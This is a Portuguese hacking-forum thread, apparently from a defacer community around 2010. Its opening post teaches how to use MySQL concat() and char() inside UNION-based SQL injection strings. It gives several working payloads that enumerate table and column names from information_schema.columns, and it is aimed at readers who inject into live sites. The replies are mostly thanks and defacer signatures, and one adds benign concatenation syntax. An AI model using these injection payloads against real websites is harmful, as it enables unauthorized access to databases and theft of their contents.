Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

[JB diz #001] concat(),char() para injeções de mySQL.

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    [JB diz #001] concat(),char() para injeções de mySQL.

    Oi pessoal tudo bem? #mysteryguitarmanhere
    Um bom tempo sem postar nada, somente respondendo tópicos eu decidi escrever alguma coisa pra colocar aqui, então segue abaixo.
    Então, tava conversando com o Exploit e resolvi postar essa dica para os meninos que ficam injetando mySQL e até trabalham com o mySQL normalmente todos os dias.

    É a função
    Código:
    concat()
    Essa função mostra strings concatenadas e você também pode usar a função char() alias, pode usar qualquer outra função existente no mySQL que possa se executar via injeção de mySQL, não esquecendo dos tratamentos que a injeção passa pelo PHP.

    e
    Código:
    char()
    Está por sua vez pode inserir valores em decimal (para quem não sabe são aqueles caracteres que são feitos com o atalho ALT+3 ALT+167)


    Exemplos:
    Código:
    =0 union select concat(table_name,column_name),2,3,4 from information_schema.columns--
    Isso retornarar algo do tipo: nametablenamecolumn
    Sendo que o "nametable" e "namecolumn" são valores separados, a função concatenou os dois e mostrou o resultado.

    Código:
    =0 union select 1,char(58),3,4 from information_schema.columns--
    A função apenas mostrar a string correspondente sendo o 58 ":"

    Código:
    =0 union select concat(column_name,char(58)),2,3,4 from information_schema.columns--
    Retorna algo do tipo: namecolumn:, a função concat() concatenou o valor do column_name com o valor do decimal 58 inserido pela função char()

    Código:
    =0 union select 1,char(68,73,82,69,84,79,82,73,79,32,83,69,67,82,69,84,79),3,4 from information_schema.columns--
    Cuidado com o que vocês irão fazer, suas ações não dependem das minhas.

    Se leu tudo e gostou, clica em obrigado.
    desenvolvido por jb // diretório secreto - 2010


    Similar Threads
    Tags: diretorio, projeto acre, secreto, sexo
    • Top
  • Font Size
    #2
    Hey, preciso dizer algo?
    Obrigado.
    Mesmo longe, eu estou perto. Guia do Hacker 4ever.
    • Top

    Comment

    • Font Size
      #3
      Valeeu , sempre bom recolher 'informações' skoaspoakspoaks

      sigpic

      "Conhecimento não é crime, crime é o que você faz com ele."
      "Nunca deixe te dizer que você não é capaz"
      "Vocês podem me acorrentar, torturar e até destruir meu corpo, mas nunca aprisionaram minha mente"



      Full Access Defacer


      e-mail & msn: warlockowned@yahoo.com.br


      • Top

      Comment

      • Font Size
        #4
        Alguém pode mover o meu tópico para Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ?
        Obrigado.
        • Top

        Comment

        • Font Size
          #5
          Pronto meu querido.
          Nao Participa ainda ?
          * Comunidade Elite Defacer


          Elite Defacer
          Hackeralp - 5ubZer0 - $cr34m()

          • Top

          Comment

          • Font Size
            #6
            Fucker!
            \O/
            ~# Criado pela [IN]Segurança #~
            • Top

            Comment

            • Font Size
              #7
              Também poderia ser utilizado assim no SQL Server:
              SELECT coluna1 + coluna2 as coluna12 FROM tabela
              E no mySQL:
              SELECT concat(coluna1,’ – ‘,coluna2) FROM tabela
              E assim vai dependendo do banco de dados, até!
              • Top

              Comment

              • Font Size
                #8
                Postado Originalmente por b4fin Ver Post
                Também poderia ser utilizado assim no SQL Server:
                Citação:
                Código:
                SELECT coluna1 + coluna2 as coluna12 FROM tabela
                E no mySQL:
                Citação:
                Código:
                SELECT concat(coluna1,’ – ‘,coluna2) FROM tabela
                E assim vai dependendo do banco de dados, até!
                concat(coluna1,’ – ‘,coluna2)

                não se você estiver mandando via $_POST ou $_GET.
                inPHP
                • Top

                Comment

                • Font Size
                  #9
                  bons tempos do sql
                  • Top

                  Comment

                  • Font Size
                    #10
                    Show de Bola
                    GERONIMO
                    • Top

                    Comment

                    Anterior template Avançar
                    X
                    Working...
                    X